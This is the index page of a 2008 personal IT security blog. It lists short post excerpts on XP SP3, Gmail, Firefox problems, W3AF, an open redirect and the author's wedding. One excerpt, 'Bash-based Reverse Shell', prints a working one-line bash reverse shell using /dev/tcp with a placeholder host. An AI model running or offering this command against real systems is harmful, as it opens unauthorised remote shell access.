ComputerDefenseComputerDefenseComputerDefense.org is an IT Security website, with a mix of python,hardware,reviews and anything else I feel like talking about... previously it hosted a daily link list.. (which may make a comeback)... Articles
Expect the Blog to be a Little Quiet
2008-05-10 02:00:00 Hey All, Time for a personal post... The next two weeks I probably won't be blogging much (or necessarily even acknowledging the blog exists).... then again maybe I will. Either way, I'm getting married on May 17th (back home in Sault Ste. Marie). Shortly after the wedding we'll be going on a brief honeymoon to Chicago ... More About: Personal , Blog , Quiet
All I can say is ?Wow?
2008-05-08 21:57:00 I read this today on a local news site and the only thought that went through my head was "wow"... Essentially a malicious individual hacked the Epilepsy Foundation's website and posted hundreds of rapidly flashing images. While I don't condone it... I can understand why people think they should target websites for profit or pride... ... More About: Security
Comments on Core Security?s Wonderware advisory
2008-05-08 16:04:00 There were a couple of random things that I wanted to comment on. The first was a post by Dave Lewis of Liquidmatrix. The post in question is a discussion of a Wonderware advisory released by Core Security and the level of detail that they provided. Dave doesn't agree with the level of detail provided... as ... More About: Comments
XP SP3 and IE
2008-05-06 09:46:00 I found this blog post rather interesting today. It's an explanation of how SP3 and IE will work together. Essentially it comes down to the following: If you have IE6: It's business as usual... you will be offered SP3 via Windows Update and you'll still be running IE6 after the update. If you have IE7: You will ...
autocomplete=off, yes? it?s really that simple.
2008-04-26 08:50:00 One of my favourite things is Autocomplete. I'm sure plenty of security folks are cringing right now, but I enjoy it. It saves me a crapload of data entry every time I want to place an order (Name, Address, Phone number) or post a blog comment (Name, Email, Website)... Anyways... what really bothers me is web ... More About: Simple
Malicious Flash on LiveJournal.com
2008-04-22 15:52:00 I don't have much to add, simply details from the original post. Spyware Sucks has a post up documenting some malicious flash that is being served from LiveJournal.com (from one of their banner ads). Just thought I should share to keep people informed. More About: Security , Flash
Kinda Quiet on the CDO Front
2008-04-22 04:31:00 I've been kinda quiet here the last few days... That being said I've been posting quite a bit on the nCircle VERT blog. I decided that I wouldn't cross post between blogs and I won't post links to CDO on the nCircle blog for no reason, however I will post links to the nCircle blog ... More About: Security , Front , Kinda , Quiet
Bash-based Reverse Shell
2008-04-17 21:07:00 This is really cool... Neohapsis has a great blog post on how a one line bash shell command can create a reverse shell (via Infosec Ramblings). Think about all those times when you needed a single command line to create a reverse shell... this will do it: exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0 That's it.. plain and simple and ... More About: Security , Shell , Bash
Problems with Firefox 2.0.0.14?
2008-04-17 16:54:00 I'm wondering if anyone has been experiencing issues with Firefox 2.0.0.14? I installed it as soon as I noticed it... which I'm guessing was 6-7 hours ago but that may be +/- an hour or two. Since then I've had Firefox crash at least 6 times (never more than two tabs open... usually GMail and ... More About: Firefox 2 , Problems
Portions of MySQL May Go Closed Source (aka Company Offers ?Paid Functional
2008-04-17 15:59:00 A while ago I stopped reading Slashdot because I generally find the information presented to be over-the-top and bordering on "zealot-like"... I suppose "overly dramatic" would work as well. However I was clicking through and ended up on the main page, which lead to reading the following headline: Sun to Begin Close Sourcing MySQL. It ... More About: Company , Source , Paid , Offers , Mysql
XP SP3 By The End of the Month
2008-04-16 23:11:00 SANS ISC is reporting that various sources are saying that we may see XP SP3 before the end of the month. With OEMs and MSDN subcribers seeing the patch on April 21st and an end-user release date of April 28th. More About: Operating Systems , Month
Gmail Google Talk Gone
2008-04-16 22:23:00 About 15 minutes ago I had connection problems with my Google Apps account. My web-based Google Chat had disappeared, so I closed my browser and reopened it, but it's gone... completely gone... the Chat tab is even gone inside my settings options. Anybody got any ideas? The X represents where the Chat Window normally is and the ... More About: Gmail , Google Talk , Talk
Redirect Validation? is it really that hard?
2008-04-15 22:11:00 This isn't a new topic... McAfee mentioned it a couple of weeks ago, and it appeared in a ha.ckers.org comment almost 2 years ago. It seems that Google Page Ad (http://www.google.com/pagead) can be abused as a redirect. This redirect won't work blindly, certain variables require certain values. However those variables aren't validated... I can generate a ... More About: Hard , Validation , Redirect
Installing W3AF on Windows XP
2008-04-15 02:06:00 This morning I talked about W3AF beta6 being available. Only now did I finally get time to install it... I wanted to test drive the UI, and it ended up being quite the task to get it installed. Part way through I realized that this would be a someone time consuming process and started documenting ... More About: Windows , Tools , Windows Xp
Interesting Links
2008-04-14 18:32:00 I've got a few interesting links that I thought I'd share. Up first is a map with the location of Google Data Centers (via Google Blogoscoped). This is actually pretty cool to check out. Next is OpenPacket.org, which I'll probably do a post about again sometime soon. For now a brief intro though. This is a great ... More About: Interesting , Links
OpenSSH 5.0 / W3AF beta 6
2008-04-14 07:23:00 Some new software shipped that I should have mentioned, and apparently it go past me.. The first is OpenSSH 5.0, release quite shortly after OpenSSH 4.9 (I believe it was 4 or 5 days). The following was attached to the release notes: We apologise for any inconvenience resulting from this release being made so shortly after 4.9. Unfortunately ... More About: Beta , Openssh
Site Updated - Now with Wordpress 2.5
2008-04-14 05:58:00 A few days ago I updated the site, and I must say... WP2.5 is awful... I'm actually disappointed that I had to upgrade. Having used typepad, WP, Greymatter, blogger and Serendipity... I was actually a really big fan of WP and thought it was about as good as they come. Now I'm not too sure ... More About: Wordpress , Site
Windows Server 2008 Release == Windows Server 2008 SP1
2008-03-26 13:22:00 Confused? I know I was... but this is actually quite interesting. OS Version (via systeminfo) Vista Ultimate Release : 6.0.6000 N/A Build 6000 Vista Ultimate Service Pack 1: 6.0.6001 Service Pack 1 Build 6001 Server 2008 Standard Release: 6.0.6001 Service Pack 1 Build 6001 You can read more about it here. More About: Windows , Operating Systems , Windows Server 2008
Using Tor Users to Solve CAPTCHAs
2008-03-23 20:00:00 A discussion elsewhere got me thinking about this, and some quick googling didn't turn anything up. If there are already write-ups on this, I would love if people could point me toward them. Let's say that you are using Tor. When your traffic traverses Tor, it hits an end-point somewhere. That end-point knows that it is ... More About: Security , Users
Thank You Google!
2008-03-23 02:08:00 A couple of weeks ago I posted about certain GMail features not being available in Google Apps for Domains. I was out of town last week and other than taking in RENT last night on stage, I've pretty much been asleep the entire time. I just logged into my Google Apps for Domains account for ... More About: Personal
Going to San Francisco
2008-03-18 06:48:00 In ~5 hours I'll be on a plane heading to San Francisco ... I'll be there for nCircle CONNECT. So if anyone is going to be in SF in the next few days... let me know... I doubt I'll have much free time, but I may have time for a drink in the hotel bar. Fire ... More About: Personal
andLinux
2008-03-16 06:01:00 For quite some time now I've been a regular user of Cooperative Linux (coLinux), which I think is best described on its website: Cooperative Linux is the first working free and open source method for optimally running Linux on Microsoft Windows natively. More generally, Cooperative Linux (short-named coLinux) is a port of the Linux kernel ... More About: Operating Systems
Gmail & LinkedIn
2008-03-15 09:34:00 I've already partially talked about this recently but I wanted to bring it up again. I'm a huge Google fan... I know a lot of people see them as the new Evil Empire, but I really don't see them that way. One of my favourite Google launches was Gmail . I used it for quite a while ... More About: Personal , Linkedin
Fraud Prevention
2008-03-10 08:43:00 One of my favourite non-IT blogs has got to be The Consumerist. I really like the idea of a public online watchdog that has the freedom to publish pretty much anything. Anyways, the other day this post caught my attention: Why doesn't a bank (cough HSBC cough) offer the option to have text message alerts sent to ... More About: Fraud , Fraud Prevention , Scams , Prevention
What is WinInit.exe?
2008-03-09 08:24:00 So I was browsing Task Manager on my Vista box as Admin (Show all users processes) and I noticed wininit.exe. This file has that "virus ring" to it, so I decided to check it out. I'm positive my system hasn't been infected with anything, but there's never harm in checking. I did some searching and ... More About: Windows , Operating Systems
Possible Memory Issue with NoScript 1.4.9.5?
2008-03-09 07:50:00 Something I've had to accept is a slow computer at home... I currently have 1GB of RAM and I'm running Vista (I've purchased new RAM, however I purchased PC-6400 and my board only supports PC-5400 (it won't clock down)). On top of Vista, I'm a Firefox user. While I like the improvements to IE7, I ... More About: Memory , Issue
Komodo Edit Now Open Source
2008-03-08 07:27:00 I just discovered this today when Komodo Edit said it had an update available... the release notes lead me to Open Komodo and I eventually stumbled across an ActiveState press release. ActiveState today announced an updated, open-sourced release of Komodo Edit, the popular and free editor for dynamic languages including Perl, PHP, Python, Ruby, and Tcl, plus ... More About: Tools , Open Source , Source
Post Sharing: Trust Me: DoS is Dead?
2008-03-07 21:48:00 For people that read my blog and don't read 360 Security , I wanted to share a blog post I recently posted over there. The concept is simple... and previously discussed, however I recently dealt with the result of this new trend and wanted to bring it to the attention of people who are unaware. Essentially ... More About: Post , Dead , Trust , Sharing
Google Apps
2008-03-03 00:37:00 I use Google Apps. I'm a huge fan and I think it's amazing. The features that are made available free of charge, are really no different than the features any gmail user gets, except that you get to apply your own domain name. At least that's what I used to think. Several people I know ... More About: Google Apps
Virtualization and Security
More articles from this author:2008-02-26 01:06:00 Virtualization. A technology that is supposed to save organizations money... take 10, 20 or even 50 physical servers and run them on a single virtual server. The concept seems to make sense; after all, as someone recently pointed out to me... virtualization has existed in the mainframe world for quite some time. The problem today ... More About: Security , Vulnerabilities , Virtualization 1, 2, 3, 4, 5, 6, 7 |
|
 |
|
 |
